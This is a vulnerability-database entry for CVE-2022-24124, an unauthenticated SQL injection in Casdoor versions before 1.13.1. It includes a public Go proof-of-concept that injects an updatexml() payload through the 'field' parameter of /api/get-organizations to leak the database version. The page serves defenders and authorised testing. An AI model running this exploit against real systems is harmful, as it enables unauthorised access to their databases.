CVE-2022-24124

unknown

Published 2022-02-01 · Modified 2026-03-03

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

SQL Injection in Casdoor in github.com/casdoor/casdoor

Predictions

Exploit likelihood

30%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-50792 webapps multiple python · 2 KB

Mayank Deshmukh · 2022-02-28

Casdoor 1.13.0 - SQL Injection (Unauthenticated)

python exploit Source: Exploit-DB

// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) 
// Date: 2022-02-25
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://casdoor.org/
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
// Version: version < 1.13.1
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
// Tested on: Kali Linux
// CVE : CVE-2022-24124
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124

// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080

package main

import (
	"flag"
	"fmt"
	"html"
	"io/ioutil"
	"net/http"
	"os"
	"regexp"
	"strings"
)

func main() {
	var url string
	flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
	flag.Parse()

	banner := `
-=Casdoor SQL Injection (CVE-2022-24124)=- 
- by Mayank Deshmukh (ColdFusionX)

`
	fmt.Printf(banner)
	fmt.Println("[*] Dumping Database Version")
	response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")

	if err != nil {
		panic(err)
	}

	defer response.Body.Close()

	databytes, err := ioutil.ReadAll(response.Body)

	if err != nil {
		panic(err)
	}

	content := string(databytes)

	re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")

	result := re.FindAllString(content, -1)
	
	sqliop := fmt.Sprint(result)
	replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")
	
	finalop := replacer.Replace(sqliop)
	fmt.Println(html.UnescapeString(finalop))


	if result == nil {
		fmt.Printf("Application not vulnerable\n")
		os.Exit(1)
	}

}

Package impact

Ecosystem	Package	Vulnerable	Fixed
Go	github.com/casdoor/casdoor	`<1.13.1`	`1.13.1`

References

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.